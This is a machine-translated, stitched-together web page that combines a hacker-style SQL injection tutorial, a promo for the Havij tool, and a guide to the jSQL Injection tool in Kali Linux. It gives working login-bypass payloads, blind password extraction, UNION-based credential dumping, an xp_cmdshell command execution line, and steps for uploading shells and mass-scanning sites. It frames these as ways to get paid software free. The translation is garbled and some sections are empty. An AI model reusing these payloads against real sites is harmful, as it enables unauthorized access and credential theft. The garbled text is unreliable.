Menu
homeMicrosoft

Instructions for using jSQL Injection, a multifunctional tool for finding and exploiting SQL injections in Kali Linux. SQL Injection from and to Sql injection

SQL Injection quite a good opportunity for a hacker to get
access to the server. And with a little effort, he
still gets it :)

Coder inside

Nowadays, working with databases is supported
almost all programming languages, these include BASIC, C++, Java, PERL, PHP, Assembler and even JavaScript! And these programs are called nothing more than DBMS - database management systems. Databases are often used to solve financial problems,
accounting, personnel organization, but they have also found their application on the Internet.

Databases are often used to write WEB applications. Their use is most appropriate for storing user registration data, session identifiers, organizing searches, as well as other tasks requiring more processing
amount of data. To access the database, server technologies are used: PHP, PERL, ASP, etc. This is where the fun begins. When on the server
all patches are installed and the firewall blocks all ports except port 80 or when authentication is required to access some data, a hacker can use SQL Injection to hack. The essence of this attack is to exploit an error at the intersection of WEB technologies and SQL. The fact is that many web pages for processing user data form a special SQL database request. Careless use of this technique can lead to quite interesting results...

SQL Injection

To explain the attack, let’s imagine that you went to the site to download one very important tool and notice with horror that only a registered user can do this, and registration, of course, costs money 🙂 You don’t want to give away your last earned money, but you can’t do it without the program! It's time to remember how
access databases SQL. For example, checking your login and password in PHP may look like this:

$result=mysql_db_query($db,"SELECT * FROM $table WHERE user="$login" AND
pass="$password"");
$num_rows=mysql_num_rows($result);
mysql_close($link);
if ($num_rows!=0)
{
// AUTHENTICATION OK
}
else
{
// AUTHENTICATION ERROR
}

I added two comments, "AUTHENTICATION OK" - instead I should
go to the code that will be executed if the password and login are correct. Another "AUTHENTICATION ERROR" is a place where the code that will be executed if they are incorrect will be described. If you fill out the form, the request will look like “http://www.server.com?login=user&password=31337”, where www.server.com is the name
the server we are trying to connect to. We found what we were looking for, and therefore we will return to work again SQL. So, if you must specify a login and password for authorization, then the generated SQL the request will look like this:

SELECT * FROM users WHERE login="user" AND
password="31337"

This means something like this: return to me all records from the users database whose login is “user” and password is “31337”. If such a record exists, then the user is registered, but if not, then not... But under certain circumstances, everything can be corrected. This refers to the situation when the application does not check the contents of the transmitted data or does not check it completely for the presence SQL instructions. In this example, two fields login and password are checked, but if you specify “31337” AND email=" [email protected]"(without double quotes), then the query will turn out a little different:

SELECT * FROM users WHERE login="user" AND password="31337" AND
email=" [email protected]"

And if the email field exists, this condition will also be checked. If you remember the basics of Boolean algebra, it comes to your mind that in addition to the “and” operation, there is also an “or”, and since their use is supported by SQL, you can
in the described way, add a condition that always returns true. To do this, you must specify “user” OR 1=1-- as the login, in which case the request will take the form:

SELECT * FROM users WHERE login="user" OR 1=1--" AND
password="31337"

First you should know that "--" means the end of the request, and everything after the "--"
will not be processed! It turns out that we made a request:

SELECT * FROM users WHERE login="user" OR 1=1

As you can see, we added the condition “1=1”, which means the verification criterion will be “if the login is “user” or 1=1”, but 1 always equals 1 (the only exception can be Dani Shepovalov’s arithmetic :)). To check our suspicions
Enter "http://www.server.com?login=user or 1=1--&password=31337" in the address bar. This leads to the fact that it does not matter which login we specified, but
especially the password! And we are in the matrix, in the system, and can calmly download what we need.

But this is all in theory. In practice, we do not know how the request is formed, what data is transmitted and in what sequence. Therefore, you must specify "user" OR 1=1--" for all fields. You should also check the submission form for hidden fields. In HTML they are described as " ". If any exist, save the page and change the values ​​of these fields. The values ​​contained in them are often forgotten to be checked for the presence of SQL statements. But for everything to work, you should specify the full path to the script in the form ("FORM" tag) for the "ACTION" parameter, which processes this request.

But it is not always known how the request is formed,
The previous example could be formed in the following ways:

SELECT * FROM users WHERE (login="user" AND password="31337")
SELECT * FROM users WHERE login="user" AND password="31337"
SELECT * FROM users WHERE login=user AND password=31337

In this case, you can try the following options:

"OR 1=1--
"OR 1=1--
OR 1=1--
" OR "a"="a
" OR "a"="a
") OR ("a"="a
OR "1"="1"

It all depends on the purpose of the script and on the programmer. Since each person tends to do everything in his own way, it is quite possible that the programmer will not choose the easiest option. Therefore, you should not immediately
give up if you get rejected. Necessary
try as many options as possible...

Password detection

Bypassing authorization is not bad, but very often the hole you are using is closed, and everything that was available to you is lost.
This is to be expected if the programmer is not a fool
Over time it will close all the loopholes. You can easily get rid of such situations by taking care of it in advance. The correct solution may be to guess the password using
analysis of authentication results. First, let's try to guess the password, to do this, enter its location:

"OR password>"a

If we are told that authorization has been passed, then the password
does not begin with the letter "a", but with one of the following on the list. Let's move on and substitute
place "a", next "b", "c", "d", "e"... etc. until they tell us that the password is not correct. Let this process stop at the character “x”, in this case two options for the development of the situation are created: the password is found or the password starts with this character. To check the first option, write the password location:

"OR password="x

and if the password is accepted and you are allowed in, then you guessed the password! Well, no, then you should select the second character,
exactly the same, from the beginning. Check for two characters
need the same. In the end, you will receive a password, and you will look for a login in the same way :)
If the found password and login do not suit you, you can find others. To do this, you need to start checking from the last character of the found password. So, if the password was "xxx" it is necessary to check the existence of the password
"xxxy":

"OR password="xxx

so as not to miss out on more than one option!

MS SQL Server

MS SQL Server is generally a godsend if the necessary filtering is missed. Using the SQL Injection vulnerability you can execute
commands on the remote server using exec master..xp_cmdshell. But to use this design
the SELECT operation must be completed. In SQL, statements are separated by semicolons. Therefore, to connect to some IP via Telnet, you need to type the password/login:

"; exec master..xp_cmdshell "telnet 192.168.0.1" --

MS SQL Server has several more interesting features that allow you to find out logins and passwords stored in the database. To do this, error output is redirected to an arbitrary server and through them
analysis, you can find out the name of the table, fields and their types. After which you can request

" UNION SELECT TOP 1 login FROM users--

(login is the name of the field containing the login, and users is the name of the table,
semi-scientists in the process of error analysis).

The answer might be:


Syntax error converting the nvarchar value "admin" to a column of data type int. !}
/default.asp, line 27

Now we know that there is a user named "admin". Now we can get his password:

" UNION SELECT TOP 1 password FROM users where login="admin"--

Result:

Microsoft OLE DB Provider for ODBC Drivers error "80040e07"
Syntax error converting the nvarchar value "xxx" to a column of data type int. !}
/tedault.asp, line 27

Now we know that there is a user "admin" with a password "xxx". With this you can safely
use it and log in to the system 😉

But there are many other functions for working with SQL,
When working with a database, you can also delete data, modify it, insert your own, and even manipulate files and work with the registry.
In general, SQL Server rules :)

Protection

But of course all this can be avoided. To do this you can
use filters,
provided by manufacturers. You can find your own solutions, for example, replacing all single
double quotes (if for SQL request we use single ones), or vice versa. You can only allow the use of letters and s@baki, if you need to enter
email address. And in pearl there is an amazing
the 🙂 quote() function in the DBI::DBD module, which successfully makes your query safe with respect to SQL. There are many solutions, you just need them
take advantage of. Otherwise, why then all this...

Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.

It’s a completely automated SQL Injection tool and it is dispersed by ITSecTeam, an Iranian security organization. The name Havij signifies “carrot”, which is the apparatus’ symbol.

The tool is outlined with an easy to understand GUI that makes it simple for an administrator to recover the coveted information. Such usability might be the purpose for the progress from attacks conveyed by code-written hackers to those by non-specialized users.

Also Read

Havij was launched amid 2010, and since it’s release a few other programmed SQL Injection devices, (for example, sqlmap) were presented. Be that as it may, Havij is as yet dynamic and normally utilized by both penetration testers and low-level hackers.

Havij SQL Injection Software Features

It can exploit a vulnerable web application. By utilizing this product client can perform back-end database unique mark, recover DBMS clients and secret key hashes, dump tables and segments, bringing information from the database, running SQL proclamations and notwithstanding getting to the hidden record framework and executing charges on the working framework.

  1. Complete HTTPS support
  2. Various updates are available
  3. Added MS SQL blind
  4. Blind MSAccess (in commercial version only)
  5. PostgreSQL
  6. Easily accessible user manual
  7. Additional dumping data file feature
  8. XML format comes with the tool for data storage
  9. User can remove the log
  10. The default settings can be changed at any time
  11. Repair methods are available to cover up the weaknesses of the website
  12. Keyword testing is also available
  13. Error fixing feature

Havij v1.12 Free Edition Download

The intensity of Havij that makes it not quite the same as comparable apparatuses is its injection techniques. The achievement rate is over 95% at injection vulnerable targets utilizing it.

The easy to understand GUI (Graphical User Interface) of Havij and automated settings and detections makes it simple to use for everyone even beginner clients.

Run the downloaded file by double clicking (you need to have a virtual machine).

3. Anonymity when checking a site for SQL injection

Setting up Tor and Privoxy in Kali Linux

[Section under development]

Setting up Tor and Privoxy on Windows

[Section under development]

Proxy settings in jSQL Injection

[Section under development]

4. Checking the site for SQL injection with jSQL Injection

Working with the program is extremely simple. Just enter the website address and press ENTER.

The following screenshot shows that the site is vulnerable to three types of SQL injections (information about them is indicated in the lower right corner). By clicking on the names of injections, you can switch the method used:

Also, the existing databases have already been displayed to us.

You can view the contents of each table:

Typically, the most interesting thing about tables is the administrator credentials.

If you are lucky and you find the administrator’s data, then it’s too early to rejoice. You still need to find the admin panel where to enter this data.

5. Search for admin panels with jSQL Injection

To do this, go to the next tab. Here we are greeted with a list of possible addresses. You can select one or more pages to check:

The convenience lies in the fact that you do not need to use other programs.

Unfortunately, there are not very many careless programmers who store passwords in clear text. Quite often in the password line we see something like

8743b52063cd84097a65d1633f5c74f5

This is a hash. You can decrypt it using brute force. And... jSQL Injection has a built-in brute forcer.

6. Brute force hashes using jSQL Injection

The undoubted convenience is that you do not need to look for other programs. There is support for many of the most popular hashes.

This is not the best option. In order to become a guru in decoding hashes, the Book “” in Russian is recommended.

But, of course, when there is no other program at hand or there is no time to study, jSQL Injection with its built-in brute force function will come in very handy.

There are settings: you can set which characters are included in the password, the password length range.

7. File operations after detecting SQL injections

In addition to operations with databases - reading and modifying them, if SQL injections are detected, the following file operations can be performed:

  • reading files on the server
  • uploading new files to the server
  • uploading shells to the server

And all this is implemented in jSQL Injection!

There are restrictions - the SQL server must have file privileges. Smart system administrators have them disabled and will not be able to gain access to the file system.

The presence of file privileges is quite simple to check. Go to one of the tabs (reading files, creating a shell, uploading a new file) and try to perform one of the specified operations.

Another very important note - we need to know the exact absolute path to the file with which we will work - otherwise nothing will work.

Look at the following screenshot:

To any attempt to operate on a file, we receive the following response: No FILE privilege(no file privileges). And nothing can be done here.

If instead you have another error:

Problem writing into [directory_name]

This means that you incorrectly specified the absolute path where you want to write the file.

In order to guess an absolute path, you need to at least know the operating system the server is running on. To do this, switch to the Network tab.

Such a record (line Win64) gives us reason to assume that we are dealing with Windows OS:

Keep-Alive: timeout=5, max=99 Server: Apache/2.4.17 (Win64) PHP/7.0.0RC6 Connection: Keep-Alive Method: HTTP/1.1 200 OK Content-Length: 353 Date: Fri, 11 Dec 2015 11:48:31 GMT X-Powered-By: PHP/7.0.0RC6 Content-Type: text/html; charset=UTF-8

Here we have some Unix (*BSD, Linux):

Transfer-Encoding: chunked Date: Fri, 11 Dec 2015 11:57:02 GMT Method: HTTP/1.1 200 OK Keep-Alive: timeout=3, max=100 Connection: keep-alive Content-Type: text/html X- Powered-By: PHP/5.3.29 Server: Apache/2.2.31 (Unix)

And here we have CentOS:

Method: HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/ Connection: keep-alive X-Cache-Lookup: MISS from t1.hoster.ru:6666 Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.37 X-Cache: MISS from t1.hoster.ru Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Date: Fri, 11 Dec 2015 12:08:54 GMT Transfer-Encoding: chunked Content-Type: text/html; charset=WINDOWS-1251

On Windows, a typical folder for sites is C:\Server\data\htdocs\. But, in fact, if someone “thought of” making a server on Windows, then, very likely, this person has not heard anything about privileges. Therefore, you should start trying directly from the C:/Windows/ directory:

As you can see, everything went fine the first time.

But the jSQL Injection shells themselves raise doubts in my mind. If you have file privileges, then you can easily upload something with a web interface.

8. Mass checking of sites for SQL injections

And even this function is available in jSQL Injection. Everything is extremely simple - download a list of sites (you can import from a file), select those that you want to check and click the appropriate button to start the operation.

Conclusion from jSQL Injection

jSQL Injection is a good, powerful tool for searching and then using SQL injections found on websites. Its undoubted advantages: ease of use, built-in related functions. jSQL Injection can be a beginner's best friend when analyzing websites.

Among the shortcomings, I would note the impossibility of editing databases (at least I did not find this functionality). As with all GUI tools, one of the disadvantages of this program can be attributed to its inability to be used in scripts. Nevertheless, some automation is also possible in this program - thanks to the built-in function of mass site scanning.

The jSQL Injection program is much more convenient to use than sqlmap. But sqlmap supports more types of SQL injections, has options for working with file firewalls and some other functions.

Bottom line: jSQL Injection is a novice hacker's best friend.

Help for this program in the Kali Linux Encyclopedia can be found on this page: http://kali.tools/?p=706